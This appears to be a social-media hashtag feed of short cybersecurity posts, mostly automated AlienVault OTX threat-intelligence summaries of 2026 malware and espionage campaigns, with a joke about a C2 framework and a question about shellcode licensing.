Middle East Conflict Fuels Opportunistic Cyber Attacks

The ongoing conflict in the Middle East has triggered a surge in cybercriminal activity. Over 8,000 newly registered domains with conflict-related keywords have been identified, many of which may be weaponized in future campaigns. Multiple cases of malicious activity have been observed, including targeted attacks using conflict-themed lures, deployment of the LOTUSLITE backdoor, fake news blogs leading to StealC malware, phishing sites impersonating government portals, donation scams, fraudulent storefronts, and meme-coin pump-and-dump schemes. Threat actors are leveraging various techniques such as DLL sideloading, shellcode execution, and social engineering to compromise victims. The campaigns demonstrate the opportunistic nature of cybercriminals in exploiting geopolitical events for malicious purposes.

Pulse ID: 69ab2d63ef698ae16cec5ef2
Pulse Link: https://otx.alienvault.com/pulse/69ab2d63ef698ae16cec5ef2
Pulse Author: AlienVault
Created: 2026-03-06 19:39:15

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberAttack #CyberAttacks #CyberSecurity #Government #InfoSec #Malware #MiddleEast #OTX #OpenThreatExchange #Phishing #RAT #ShellCode #SideLoading #SocialEngineering #Stealc #StealcMalware #Word #bot #AlienVault

If the Kardashians launched their own framework it would be Kommand and Kontrol (K2).

The Momager (Kris.exe or Kris.sh): The primary C2 listener.
The Glow Up: Privesc
Keeping Up: Lateral movement

#C2Framework #RedTeaming #PostExploitation #MalwareDevelopment #Infosec #CyberSecurity #EDRBypass #ActiveDirectory #PenTesting #ThreatHunting #MITREATTACK #APTHunting #Shellcode #ZeroDay #Persistence #Exfiltration #BlueTeam #PurpleTeaming #kardashians

SloppyLemming Deploys BurrowShell and Rust-Based RAT to Target Pakistan and Bangladesh

An extensive cyber espionage campaign conducted by SloppyLemming, an India-nexus threat actor, targeted government entities and critical infrastructure in Pakistan and Bangladesh from January 2025 to January 2026. The campaign used two attack vectors: PDF lures with ClickOnce execution chains and macro-enabled Excel documents. It deployed a custom x64 shellcode implant named BurrowShell and a Rust-based keylogger. The attackers extensively abused Cloudflare Workers for C2 and payload delivery, registering 112 domains impersonating government entities. The campaign focused on nuclear, defense, telecommunications, energy, and financial sectors, aligning with regional strategic competition in South Asia.

Pulse ID: 69a6c1d2775c55bd8367e527
Pulse Link: https://otx.alienvault.com/pulse/69a6c1d2775c55bd8367e527
Pulse Author: AlienVault
Created: 2026-03-03 11:11:14

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Asia #Bangladesh #Cloud #CyberSecurity #Espionage #Excel #Government #India #InfoSec #KeyLogger #Mac #OTX #OpenThreatExchange #PDF #Pakistan #RAT #Rust #ShellCode #SouthAsia #Telecom #Telecommunication #bot #AlienVault

APT37 Adds New Capabilities for Air-Gapped Networks

APT37, a DPRK-backed threat group, has launched a new campaign called Ruby Jumper, utilizing Windows shortcut files to initiate attacks with newly discovered tools. These tools include RESTLEAF, SNAKEDROPPER, THUMBSBD, and VIRUSTASK, which work together to deliver surveillance payloads like FOOTWINE and BLUELIGHT. The campaign leverages removable media to infect and communicate with air-gapped systems. Key features include the use of Ruby for shellcode-based payloads, abuse of cloud storage services for command and control, and sophisticated techniques for bypassing network isolation. The malware demonstrates advanced capabilities in system reconnaissance, data exfiltration, and persistent surveillance.

Pulse ID: 69a06896d797f45ad8da76b0
Pulse Link: https://otx.alienvault.com/pulse/69a06896d797f45ad8da76b0
Pulse Author: AlienVault
Created: 2026-02-26 15:36:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#APT37 #Cloud #CyberSecurity #DPRK #EDR #InfoSec #Malware #OTX #OpenThreatExchange #RAT #Rust #ShellCode #Windows #bot #AlienVault

The Latest PlugX Variant Executed by STATICPLUGIN

In January 2026, a new variant of the PlugX malware was observed being used in targeted attacks. Analysis suggests involvement of the UNC6384 APT group, linked to Mustang Panda, targeting government agencies in Southeast Asia. The malware uses a browser updater disguise to download and execute a malicious MSI file, leading to PlugX infection. The STATICPLUGIN downloader uses a revoked code-signing certificate from a Chinese company. The PlugX variant employs DLL sideloading and shellcode execution techniques. Its configuration is encrypted using RC4 and custom encoding. C2 servers were identified as fruitbrat[.]com and 108.165.255[.]97:443. The ongoing improvements to PlugX indicate its continued use in targeted attacks by APT groups.

Pulse ID: 699edea96aa1a8d035261fc9
Pulse Link: https://otx.alienvault.com/pulse/699edea96aa1a8d035261fc9
Pulse Author: AlienVault
Created: 2026-02-25 11:36:09

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Asia #Browser #Chinese #CyberSecurity #Government #InfoSec #Malware #OTX #OpenThreatExchange #PlugX #RAT #ShellCode #SideLoading #bot #AlienVault

MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites

A sophisticated ClickFix campaign has been uncovered, compromising legitimate websites to deliver a multi-stage malware chain. The attack culminates in MIMICRAT, a custom remote access trojan with advanced capabilities. The campaign uses compromised sites across industries and geographies for delivery, employing a five-stage PowerShell chain that bypasses security measures before deploying a Lua-scripted shellcode loader. MIMICRAT, the final payload, is a native C++ RAT featuring malleable C2 profiles, Windows token theft, and SOCKS5 proxy functionality. The attack chain involves multiple compromised websites, obfuscated scripts, and sophisticated evasion techniques, demonstrating a high level of operational sophistication.

Pulse ID: 699874fdcc7eaabe6bb130ac
Pulse Link: https://otx.alienvault.com/pulse/699874fdcc7eaabe6bb130ac
Pulse Author: AlienVault
Created: 2026-02-20 14:51:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #LUA #Malware #Mimic #OTX #OpenThreatExchange #PowerShell #Proxy #RAT #RemoteAccessTrojan #ShellCode #Trojan #Windows #bot #socks5 #AlienVault

How ClickFix Opens the Door to Stealthy StealC Information Stealer

This analysis examines a sophisticated attack chain targeting Windows systems through social engineering. It uses fake CAPTCHA verification pages to trick users into executing malicious PowerShell commands. The multi-stage infection process ultimately deploys the StealC information stealer, a commodity malware designed to harvest sensitive data. The attack chain includes PowerShell scripts, position-independent shellcode, and a PE downloader, utilizing techniques like reflective PE loading, API hashing, and process injection to evade detection. StealC's capabilities include stealing browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials, and system information. The malware uses encrypted C2 communication and operates without persistence, making it particularly stealthy.

Pulse ID: 6994ac3199278b0524647f4c
Pulse Link: https://otx.alienvault.com/pulse/6994ac3199278b0524647f4c
Pulse Author: AlienVault
Created: 2026-02-17 17:58:09

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CAPTCHA #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #Outlook #PowerShell #RAT #ShellCode #SocialEngineering #Stealc #Steam #Windows #bot #cryptocurrency #AlienVault

This multi-part blog series is discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

In part 4 we cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set.

Learn more at https://cirosec.de/en/news/windows-instrumentation-callbacks-part-4/

#Blog #Windows #Shellcode #RedTeaming #ReverseEngineering

Dumb Question: what is the license of the shellcode in ShellStorm's Shellcodes Database? I cannot find any mention of a license on the website. People have started creating their own git repos to mirror the website's contents, also without any mention of a license or copyright. I feel like this is a big copyright/licensing legal problem waiting to happen.

Also, what if you only copy/paste in the hex bytes from the assembled shellcode into another project? What if you add comments with the assembly source code next to each line of hex bytes? Is that considered "derived work"?

/cc @JonathanSalwan

#shellcode #shellstorm